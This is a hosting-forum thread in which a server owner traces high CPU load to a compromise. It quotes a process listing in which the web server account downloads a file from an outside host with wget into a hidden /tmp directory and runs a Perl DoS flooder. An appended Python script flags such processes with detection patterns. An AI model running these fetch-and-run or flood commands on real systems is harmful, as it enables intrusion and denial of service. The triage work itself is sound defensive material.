Full Version: Load 68.11??
Jackula
I have a question, my CPU usage seems to be off the scale these days. My server is the 2.4 Celeron plan, but things shouldn't be this bad. It started off a few days ago with CPanel reporting random users using 90%+ of the CPU for more than 6 hours, then yesterday nobody was using 2.11 of it, and then today I have nobody using a whopping 68.11 (I believe this is 6811%).

Orbit is no help, I have to pay an hourly fee for them to find out what's wrong. I checked the number of MYSQL processes running, zero.

This problem doesn't occur all the time, it seems to be random, usage stays at around 0.05 on some days all day round, but it's friggin annoying to get this 3-4 days a week.

I've used chkrootkit and it says bindshell, but I heard that's normal. Says possible slapper, I manually checked for the bugtraq files in the tmp, but they weren't there so false alarm I guess... Can someone please tell me what's wrong?

Jack
qurazyquisp
Maybe your server has been compromised?

I'd talk with Rack911.com they are very, very knowledgeable, and charge very little. Many people at WHT are very happy with them.
voth
I would ask, since you say it's not an all-the-time thing, can you monitor the box and report back which applications are running at X%, if you can do this for about an hour a day for the next 2 - 3 days.

I would also like you to note the times at which this is happening. In addition you will need to figure out what your peak usage time is versus normal activity time.

By doing this you may be able to isolate the issue and support could better assist you in this issue.
Jackula
Alright, I am compromised :(

A group of entries doing dos attacks:


nobody 27789 0.0 0.2 5312 1048 ? S 15:19 0:00 sh -c (sleep 55555;killall -9 udp) &
nobody 27790 0.0 0.1 4928 536 ? S 15:19 0:00 _ sleep 55555
nobody 11665 0.0 1.1 16224 5828 ? S 11:44 0:04 _ /usr/local/apache/bin/httpd -DSSL
nobody 27778 0.0 0.2 5312 1060 ? S 15:19 0:00 | _ sh -c echo _START_; cd /tmp;mkdir .s.PGSQL.;cd .s.PGSQL.;wget www.umhroot.org/trip/db;
nobody 27787 53.9 0.2 6388 1048 ? R 15:19 173:37 | _ perl db 207.44.180.101 =80 55555


Guess I'll do a os reload sometime soon, what a hassle, have no idea how this happened. But is there any way I can automatically stop the db process?

Jack

EDIT: I've checked bash history, that guy didn't clean it, cleared all the files out of those directories he stuffed the dos programs in, disabled wget, lynx, who and gcc, hope this works b4 I do a reload ;)

EDIT2: w00t fixed! Having a different problem now, every day at around midnight my account gets 32000 spam messages which puts exim off the scales, is there any way to solve this problem without having to terminate the account?
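
Added example, not part of the thread: a triage check for the pattern in the process listing above, where the web server account (nobody) runs shells, a downloader and a script from a hidden directory under /tmp. The sample lines are constructed from that listing with a placeholder host and IP address; the rule labels, the function name and the CPU threshold are assumptions.

```python
import re

# Constructed sample modelled on the `ps` listing in the post above;
# the host name and IP address are placeholders, not values from the thread.
SAMPLE_PS = """\
nobody 11665 0.0 1.1 16224 5828 ? S 11:44 0:04 \\_ /usr/local/apache/bin/httpd -DSSL
nobody 27778 0.0 0.2 5312 1060 ? S 15:19 0:00 | \\_ sh -c echo _START_; cd /tmp;mkdir .s.PGSQL.;cd .s.PGSQL.;wget files.example.invalid/db;
nobody 27787 53.9 0.2 6388 1048 ? R 15:19 173:37 | \\_ perl db 192.0.2.10 =80 55555
nobody 27789 0.0 0.2 5312 1048 ? S 15:19 0:00 sh -c (sleep 55555;killall -9 udp) &
root 1021 0.0 0.3 9000 2000 ? S 09:00 0:01 /usr/sbin/sshd
"""

# (label, pattern matched against the command line) - assumed heuristics
RULES = [
    ("shell", re.compile(r"^(sh|bash)\b")),                  # web user spawned a shell
    ("downloader", re.compile(r"\b(wget|curl|lynx)\b")),     # fetching files
    ("tmp-dir", re.compile(r"(/tmp|/var/tmp|/dev/shm)\b")),  # world-writable dirs
    ("hidden-dir", re.compile(r"\b(cd|mkdir)\s+\.[^\s;/.]")),  # dot-directory use
    ("script-interpreter", re.compile(r"^(perl|python|php)\s+[^-\s]")),
]

def flag_suspicious(ps_text, web_user="nobody", cpu_limit=50.0):
    """Return [(pid, [reasons])] for web_user processes that match a rule."""
    findings = []
    for line in ps_text.splitlines():
        f = line.split(None, 10)  # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME CMD
        if len(f) < 11 or not f[1].isdigit() or f[0] != web_user:
            continue  # header, short line, or a different account
        cmd = re.sub(r"^[|\\_\s]+", "", f[10])  # drop process-tree drawing chars
        reasons = [label for label, rx in RULES if rx.search(cmd)]
        if float(f[2]) >= cpu_limit:
            reasons.append("high-cpu")
        if reasons:
            findings.append((int(f[1]), reasons))
    return findings

if __name__ == "__main__":
    for pid, reasons in flag_suspicious(SAMPLE_PS):
        print(pid, ",".join(reasons))
```

The httpd worker itself is not flagged; only its children that match a rule are reported, which is the parent/child relationship visible in the listing.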